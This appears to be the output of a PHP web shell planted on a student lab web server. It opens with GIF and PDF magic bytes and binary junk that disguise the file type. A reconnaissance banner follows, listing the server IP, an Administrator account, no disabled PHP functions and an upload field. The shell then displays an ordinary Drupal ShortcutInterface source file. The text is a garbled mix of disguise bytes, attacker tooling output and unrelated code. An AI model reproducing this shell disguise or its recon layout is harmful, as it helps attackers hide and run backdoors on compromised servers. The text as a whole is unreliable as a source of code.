GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/shortcut/src/ |
Upload File : |
<?php namespace Drupal\shortcut; use Drupal\Core\Entity\ContentEntityInterface; /** * Provides an interface defining a shortcut entity. */ interface ShortcutInterface extends ContentEntityInterface { /** * Returns the title of this shortcut. * * @return string * The title of this shortcut. */ public function getTitle(); /** * Sets the title of this shortcut. * * @param string $title * The title of this shortcut. * * @return \Drupal\shortcut\ShortcutInterface * The called shortcut entity. */ public function setTitle($title); /** * Returns the weight among shortcuts with the same depth. * * @return int * The shortcut weight. */ public function getWeight(); /** * Sets the weight among shortcuts with the same depth. * * @param int $weight * The shortcut weight. * * @return \Drupal\shortcut\ShortcutInterface * The called shortcut entity. */ public function setWeight($weight); /** * Returns the URL object pointing to the configured route. * * @return \Drupal\Core\Url * The URL object. */ public function getUrl(); }